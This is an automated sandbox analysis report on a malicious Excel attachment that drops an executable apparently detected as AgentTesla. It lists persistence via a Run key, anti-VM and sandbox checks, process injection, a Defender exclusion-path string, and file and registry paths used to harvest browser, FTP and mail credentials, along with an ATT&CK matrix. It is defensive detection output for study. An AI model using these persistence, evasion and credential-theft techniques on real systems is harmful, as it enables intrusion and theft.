Source: C:\Users\Public\vbc.exe Code function: 5_2_00AD3BCE push es; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_00223868 pushfd ; iretd
Source: C:\Users\Public\vbc.exe Code function: 5_2_0022131F pushfd ; iretd
Source: C:\Users\Public\vbc.exe Code function: 5_2_00221390 pushfd ; iretd
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C58AB pushad ; retf
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 6_2_00213BCE push es; ret
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 6_2_00713232 push esp; retf
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 7_2_00213BCE push es; ret
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 7_2_0044131F pushfd ; iretd
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 7_2_00441390 pushfd ; iretd
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 8_2_00371122 push ecx; ret
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 8_2_00371144 push ecx; ret
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 8_2_00713232 push esp; retf
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Code function: 9_2_002013D0 pushfd ; iretd
Source: initial sample Static PE information: section name: .text entropy: 7.65432769583
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe

                      Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run tnvLnx

                      Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exeProcess information set: NOOPENFILEERRORBOX
Source: AGG POWER RFQ.xlsx | Stream path 'EncryptedPackage' entropy: 7.99985102724 (max. 8.0)

                      Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match | File source: Process Memory Space: tnvLnx.exe PID: 764, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2155176869.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000006.00000002.2221988672.0000000002426000.00000004.00000001.sdmp, tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe | Window / User API: threadDelayed 9674
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Window / User API: threadDelayed 2968
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Window / User API: threadDelayed 9715
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2704 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2864 | Thread sleep time: -104524s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2968 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3016 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2312 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2312 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2292 | Thread sleep count: 9674 > 30
Source: C:\Users\Public\vbc.exe TID: 856 | Thread sleep count: 65 > 30
Source: C:\Users\Public\vbc.exe TID: 2312 | Thread sleep count: 93 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2628 | Thread sleep time: -103694s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2612 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2432 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2724 | Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676 | Thread sleep count: 2968 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2676 | Thread sleep count: 198 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2112 | Thread sleep time: -104455s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2664 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2548 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2656 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 260 | Thread sleep count: 9715 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 2864 | Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe TID: 3020 | Thread sleep count: 96 > 30
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Last function: Thread delayed
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 104524
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 103694
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 104455
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Thread delayed: delay time: 30000
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: tnvLnx.exe, 00000008.00000002.2242859365.0000000002346000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Memory written: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Memory written: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Process created: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2366923007.0000000000FB0000.00000002.00000001.sdmp | Binary or memory string: !Progman
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Queries volume information: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\tnvLnx\tnvLnx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Yara detected AgentTesla
Source: Yara match | File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match | File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
Source: Yara match | File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to harvest and steal ftp login credentials
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match | File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY

                      Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match; File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Yara detected AgentTesla
Source: Yara match; File source: 00000007.00000002.2242803026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2366293471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2367132534.0000000002821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2243225346.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.2222286152.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2366050589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2367095229.00000000027E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2366999584.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2155416176.0000000003409000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2366705481.0000000002161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2243257481.0000000003329000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: tnvLnx.exe PID: 1664, type: MEMORY
Source: Yara match; File source: Process Memory Space: vbc.exe PID: 2908, type: MEMORY
Source: Yara match; File source: Process Memory Space: vbc.exe PID: 1980, type: MEMORY
Source: Yara match; File source: Process Memory Space: tnvLnx.exe PID: 152, type: MEMORY
Source: Yara match; File source: 4.2.vbc.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.tnvLnx.exe.3553848.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.tnvLnx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.tnvLnx.exe.3473848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.tnvLnx.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.tnvLnx.exe.3473848.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.tnvLnx.exe.3553848.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.vbc.exe.3553848.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Numbers in parentheses are the report's own per-technique counts, kept as shown in the original matrix.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (211) | Registry Run Keys / Startup Folder (1) | Extra Window Memory Injection (1) | Disable or Modify Tools (11) | OS Credential Dumping (2) | File and Directory Discovery (1) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (13) | Boot or Logon Initialization Scripts | Process Injection (112) | Deobfuscate/Decode Files or Information (1) | Credentials in Registry (1) | System Information Discovery (114) | Remote Desktop Protocol | Data from Local System (2) | Exfiltration Over Bluetooth | Encrypted Channel (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder (1) | Obfuscated Files or Information (21) | Security Account Manager | Security Software Discovery (211) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Non-Standard Port (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (2) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Extra Window Memory Injection (1) | LSA Secrets | Virtualization/Sandbox Evasion (131) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (32) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading (111) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion (131) | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection (112) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

Behavior Graph ID: 435321; Sample: AGG POWER RFQ.xlsx; Start date: 16/06/2021; Architecture: WINDOWS; Score: 100

Signatures attached to the sample node:
• Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
• Found malware configuration
• Multi AV Scanner detection for submitted file
• 13 other signatures

